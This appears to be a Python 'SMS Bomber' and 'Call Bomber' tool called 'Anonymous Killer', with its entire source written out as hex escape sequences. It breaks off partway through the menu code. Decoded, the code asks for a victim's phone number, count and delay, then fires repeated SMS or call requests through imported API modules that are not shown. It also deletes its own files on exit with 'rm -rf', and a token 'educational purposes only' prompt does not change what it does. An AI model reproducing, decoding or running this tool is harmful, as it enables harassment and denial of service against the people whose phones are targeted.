\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x0a\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x79\x74\x68\x6f\x6e\x33\x0a\x23\x20\x54\x68\x69\x73\x20\x50\x79\x74\x68\x6f\x6e\x20\x66\x69\x6c\x65\x20\x75\x73\x65\x73\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x75\x74\x66\x2d\x38\x0a\x23\x20\x74\x68\x69\x73\x20\x63\x6f\x64\x65\x20\x69\x73\x20\x64\x6f\x6e\x65\x20\x62\x79\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x69\x74\x68\x75\x62\x2e\x63\x6f\x6d\x2f\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x22\x0a\x69\x6d\x70\x6f\x72\x74\x20\x67\x65\x74\x70\x61\x73\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x62\x61\x73\x65\x36\x34\x0a\x69\x6d\x70\x6f\x72\x74\x20\x6d\x75\x6c\x74\x69\x70\x72\x6f\x63\x65\x73\x73\x69\x6e\x67\x0a\x69\x6d\x70\x6f\x72\x74\x20\x67\x65\x74\x74\x65\x78\x74\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x79\x73\x0a\x23\x69\x6d\x70\x6f\x72\x74\x20\x73\x73\x6c\x0a\x69\x6d\x70\x6f\x72\x74\x20\x72\x65\x0a\x69\x6d\x70\x6f\x72\x74\x20\x6a\x73\x6f\x6e\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x63\x74\x79\x70\x65\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x72\x61\x6e\x64\x6f\x6d\x0a\x69\x6d\x70\x6f\x72\x74\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x0a\x66\x72\x6f\x6d\x20\x74\x69\x6d\x65\x20\x69\x6d\x70\x6f\x72\x74\x20\x73\x6c\x65\x65\x70\x0a\x66\x72\x6f\x6d\x20\x6f\x73\x20\x69\x6d\x70\x6f\x72\x74\x20\x73\x79\x73\x74\x65\x6d\x2c\x20\x65\x6e\x76\x69\x72\x6f\x6e\x2c\x20\x70\x61\x74\x68\x2c\x20\x67\x65\x74\x75\x69\x64\x2c\x20\x72\x65\x6d\x6f\x76\x65\x0a\x66\x72\x6f\x6d\x20\x64\x69\x73\x74\x75\x74\x69\x6c\x73\x2e\x64\x69\x72\x5f\x75\x74\x69\x6c\x20\x69\x6d\x70\x6f\x72\x74\x20\x63\x6f\x70\x79\x5f\x74\x72\x65\x65\x0a\x66\x72\x6f\x6d\x20\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x20\x69\x6d\x70\x6f\x72\x74\x20\x63\x68\x65\x63\x6b\x5f\x6f\x75\x74\x70\x75\x74\x2c\x20\x43\x61\x6c\x6c\x65\x64\x50\x72\x6f\x63\x65\x73\x73\x45\x72\x72\x6f\x72\x0a\x66\x72\x6f\x6d
\x20\x6d\x75\x6c\x74\x69\x70\x72\x6f\x63\x65\x73\x73\x69\x6e\x67\x20\x69\x6d\x70\x6f\x72\x74\x20\x50\x72\x6f\x63\x65\x73\x73\x0a\x66\x72\x6f\x6d\x20\x73\x79\x73\x20\x69\x6d\x70\x6f\x72\x74\x20\x73\x74\x64\x6f\x75\x74\x2c\x20\x61\x72\x67\x76\x2c\x20\x65\x78\x69\x74\x0a\x66\x72\x6f\x6d\x20\x64\x61\x74\x61\x20\x69\x6d\x70\x6f\x72\x74\x20\x2a\x0a\x66\x72\x6f\x6d\x20\x61\x70\x69\x20\x69\x6d\x70\x6f\x72\x74\x20\x2a\x0a\x66\x72\x6f\x6d\x20\x62\x61\x6e\x6e\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x20\x2a\x0a\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x20\x59\x45\x4c\x4c\x4f\x57\x2c\x20\x59\x45\x4c\x4c\x4f\x57\x32\x2c\x20\x47\x52\x45\x45\x4e\x32\x20\x3d\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x39\x31\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x34\x36\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x36\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x32\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x33\x3b\x30\x6d\x27\x20\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x33\x6d\x27\x20\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x39\x33\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x39\x32\x6d\x27\x0a\x62\x6c\x69\x6e\x6b\x20\x3d\x20\x22\x5c\x30\x33\x33\x5b\x35\x6d\x22\x0a\x63\x6f\x6c\x6f\x72\x73\x3d\x5b\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x31\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x32\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x33\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x34\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x35\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x36\x6d\x27\x5d\x0a\x57\x3d\x27\x5c\x30\x33\x33\x5b\x30\x6d\x27\x0a\x64\x65\x66\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x3a\x0a\x20\x20\x20\x20\x72\x65\x6d\x6f\x76\x65\x28\x22\x2e\x6d\x61\x69\x6e\x5f\x62\x6f\x6d\x62\x2e\x70\x79\x22\x29\x0a\x20\x20\x20\x20\x72\x65\x6d\x6f\x76\x65\x28\x22\x61\x70\x69\x2e\x70\x79\x22\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x72\x6d\x20\x2d\x72\x66
\x20\x64\x61\x74\x61\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x22\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x47\x52\x45\x45\x4e\x29\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x65\x63\x68\x6f\x20\x22\x5c\x74\x5c\x74\x54\x68\x61\x6e\x6b\x73\x20\x46\x6f\x72\x20\x55\x73\x69\x6e\x67\x20\x54\x68\x69\x73\x20\x54\x6f\x6f\x6c\x20\x3a\x29\x22\x20\x7c\x20\x62\x6f\x78\x65\x73\x20\x2d\x64\x20\x62\x6f\x79\x27\x29\x0a\x20\x20\x20\x20\x65\x78\x69\x74\x28\x29\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x23\x0a\x64\x65\x66\x20\x6d\x61\x69\x6e\x5f\x71\x28\x29\x3a\x0a\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x69\x6e\x70\x75\x74\x28\x22\x5c\x6e\x44\x6f\x20\x79\x6f\x75\x20\x61\x67\x72\x65\x65\x20\x74\x6f\x20\x75\x73\x65\x20\x74\x68\x69\x73\x20\x74\x6f\x6f\x6c\x20\x66\x6f\x72\x20\x65\x64\x75\x63\x61\x74\x69\x6f\x6e\x61\x6c\x20\x70\x75\x72\x70\x6f\x73\x65\x73\x20\x6f\x6e\x6c\x79\x3f\x20\x7b\x35\x7d\x28\x7b\x33\x7d\x59\x7b\x35\x7d\x2f\x7b\x30\x7d\x4e\x7b\x35\x7d\x29\x5c\x6e\x7b\x35\x7d\x2d\x2d\x2d\x2d\x3e\x7b\x32\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x27\x59\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x35\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72
\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x6e\x7b\x30\x7d\x59\x4f\x55\x20\x41\x52\x45\x20\x4e\x4f\x54\x20\x41\x55\x54\x48\x4f\x52\x49\x5a\x45\x44\x20\x54\x4f\x20\x55\x53\x45\x20\x54\x48\x49\x53\x20\x54\x4f\x4f\x4c\x2e\x59\x4f\x55\x20\x43\x41\x4e\x20\x4f\x4e\x4c\x59\x20\x55\x53\x45\x20\x49\x54\x20\x46\x4f\x52\x20\x45\x44\x55\x43\x41\x54\x49\x4f\x4e\x41\x4c\x20\x50\x55\x52\x50\x4f\x53\x45\x2e\x21\x20\x5d\x7b\x34\x7d\x5c\x6e\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x64\x65\x66\x20\x6d\x61\x69\x6e\x5f\x62\x61\x6e\x6e\x65\x72\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6c\x6f\x67\x6f\x0a\x20\x20\x20\x20\x41\x61\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x31\x6d\x27\x0a\x20\x20\x20\x20\x42\x62\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x32\x6d\x27\x0a\x20\x20\x20\x20\x43\x63\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x33\x6d\x27\x0a\x20\x20\x20\x20\x44\x64\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x34\x6d\x27\x0a\x20\x20\x20\x20\x45\x65\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x35\x6d\x27\x0a\x20\x20\x20\x20\x46\x66\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x36\x6d\x27\x0a\x20\x20\x20\x20\x78\x58\x3d\x28\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x5b\x41\x61\x2c\x42\x62\x2c\x43\x63\x2c\x44\x64\x2c\x45\x65\x2c\x46\x66\x5d\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x20\x28\x22\x7b\x30\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x78\x58\x29\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x65\x63\x68\x6f\x20\x22\x5c\x74\x5c\x74\x57\x65\x6c\x63\x6f\x6d\x65\x20\x54\x6f\x20\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x20\x4b\x69\x6c\x6c\x65\x72\x20\x3a\x29\x22\x20\x7c\x20\x62\x6f\x78\x65\x73
\x20\x2d\x64\x20\x62\x6f\x79\x27\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x20\x28\x22\x7b\x30\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x44\x45\x46\x41\x55\x4c\x54\x20\x29\x29\x0a\x20\x20\x20\x20\x0a\x64\x65\x66\x20\x72\x65\x6d\x73\x70\x28\x6e\x75\x6d\x29\x3a\x0a\x20\x20\x20\x20\x6e\x75\x6d\x20\x3d\x20\x6e\x75\x6d\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x20\x27\x2c\x20\x27\x27\x29\x0a\x20\x20\x20\x20\x6e\x75\x6d\x20\x3d\x20\x6e\x75\x6d\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x2d\x27\x2c\x20\x27\x27\x29\x0a\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x6e\x75\x6d\x0a\x0a\x64\x65\x66\x20\x6e\x65\x74\x28\x29\x3a\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x63\x6c\x65\x61\x72\x27\x29\x0a\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x20\x20\x20\x20\x6d\x20\x3d\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x77\x67\x65\x74\x20\x2d\x71\x20\x2d\x2d\x73\x70\x69\x64\x65\x72\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x27\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6d\x20\x3d\x3d\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x23\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x54\x75\x72\x6e\x20\x6f\x6e\x20\x79\x6f\x75\x72\x20\x69\x6e\x74\x65\x72\x6e\x65\x74\x20\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x5c\x6e\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x20\x59\x45\x4c\x4c\x4f\x57\x20\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x0a\x64\x65\x66\x20\x69\x6e\x73\x74\x61\x6c\x6c\x5f\x74\x6f\x6f\x6c\x73\x28\x29\x3a\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x32\x7d\x5b\x7b\x30\x7d\x3e\x7b\x32\x7d\x5d\x7b\x30\x7d\x49\x6e\x73\x74\x61\x6c\x6c\x69\x6e\x67\x20\x52\x65\x71\x75\x69\x72\x65\x6d\x65\x6e
\x74\x73\x2e\x2e\x2e\x2e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x61\x70\x74\x20\x69\x6e\x73\x74\x61\x6c\x6c\x20\x70\x79\x74\x68\x6f\x6e\x20\x63\x75\x72\x6c\x20\x2d\x79\x22\x29\x23\x66\x69\x67\x6c\x65\x74\x20\x74\x6f\x69\x6c\x65\x74\x20\x62\x6f\x78\x65\x73\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x61\x70\x74\x20\x69\x6e\x73\x74\x61\x6c\x6c\x20\x70\x79\x74\x68\x6f\x6e\x33\x2d\x70\x69\x70\x22\x29\x0a\x20\x20\x20\x20\x66\x20\x3d\x20\x6f\x70\x65\x6e\x28\x22\x6c\x6f\x76\x65\x22\x2c\x20\x22\x77\x22\x29\x0a\x20\x20\x20\x20\x66\x2e\x77\x72\x69\x74\x65\x28\x22\x5c\x74\x5c\x74\x75\x20\x6c\x6f\x6f\x6b\x20\x73\x6f\x20\x62\x65\x61\x75\x74\x69\x66\x75\x6c\x20\x3a\x29\x5c\x6e\x5c\x6e\x74\x68\x69\x73\x20\x69\x73\x20\x63\x72\x65\x61\x74\x20\x62\x79\x20\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x22\x29\x0a\x20\x20\x20\x20\x66\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0a\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x43\x6f\x6e\x74\x69\x6e\x75\x65\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x0a\x64\x65\x66\x20\x63\x68\x65\x63\x6b\x5f\x74\x6f\x6f\x6c\x28\x29\x3a\x0a\x20\x20\x20\x20\x69\x66\x20\x70\x61\x74\x68\x2e\x69\x73\x66\x69\x6c\x65\x28\x27\x6c\x6f\x76\x65\x27
\x29\x20\x3d\x3d\x20\x46\x61\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x73\x74\x61\x6c\x6c\x5f\x74\x6f\x6f\x6c\x73\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x34\x7d\x41\x6c\x6c\x20\x52\x65\x71\x75\x69\x72\x65\x6d\x65\x6e\x74\x73\x20\x46\x6f\x75\x6e\x64\x2e\x2e\x2e\x2e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x4d\x41\x49\x4e\x20\x4d\x45\x4e\x55\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x0a\x64\x65\x66\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x3a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x67\x6c
\x6f\x62\x61\x6c\x20\x6d\x6f\x64\x75\x6c\x65\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x20\x53\x45\x4c\x45\x43\x54\x20\x41\x4e\x59\x20\x4d\x4f\x44\x55\x4c\x45\x20\x21\x21\x7b\x30\x7d\x5d\x20\x5c\x6e\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x31\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x53\x4d\x53\x20\x42\x6f\x6d\x62\x65\x72\x20\x7b\x34\x7d\x20\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x32\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x43\x61\x6c\x6c\x20\x42\x6f\x6d\x62\x65\x72\x7b\x34\x7d\x20\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x33\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x48\x69\x73\x74\x6f\x72\x79\x20\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x34\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x45\x78\x69\x74\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x35\x7d\x2d\x2d\x2d\x2d\x3e\x7b\x32\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x3d\x20\x27\x31\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x0a
\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6f\x5f\x73\x6d\x73\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x20\x3d\x20\x5b\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x2c\x31\x34\x2c\x31\x35\x2c\x31\x36\x5d\x23\x31\x30\x30\x2c\x31\x30\x31\x2c\x31\x30\x32\x2c\x31\x30\x33\x2c\x31\x30\x34\x2c\x31\x30\x36\x20\x20\x23\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6d\x73\x5f\x66\x69\x72\x65\x28\x70\x6e\x2c\x20\x6e\x6d\x2c\x20\x64\x6c\x2c\x20\x63\x68\x2c\x20\x73\x74\x72\x28\x63\x63\x29\x29\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x3d\x20\x27\x32\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6f\x5f\x63\x61\x6c\x6c\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x20\x3d\x20\x5b\x31\x30\x30\x2c\x20\x31\x30\x31\x2c\x20\x31\x30\x32\x2c\x20\x31\x30\x33\x2c\x20\x31\x30\x34\x2c\x20\x31\x30\x36\x5d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x61\x6c\x6c\x5f\x66\x69\x72\x65\x28\x70\x6e\x2c\x20\x6e\x6d\x2c\x20\x64\x6c\x2c\x20\x63\x68\x2c\x20\x73\x74\x72\x28\x63\x63\x29\x29\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x3d\x20\x27\x33\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x20\x53\x45\x4c\x45\x43\x54\x20\x41\x4e\x59\x20\x4d\x4f\x44\x55\x4c\x45\x20\x21\x21\x7b\x30\x7d\x5d\x20\x5c\x6e\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x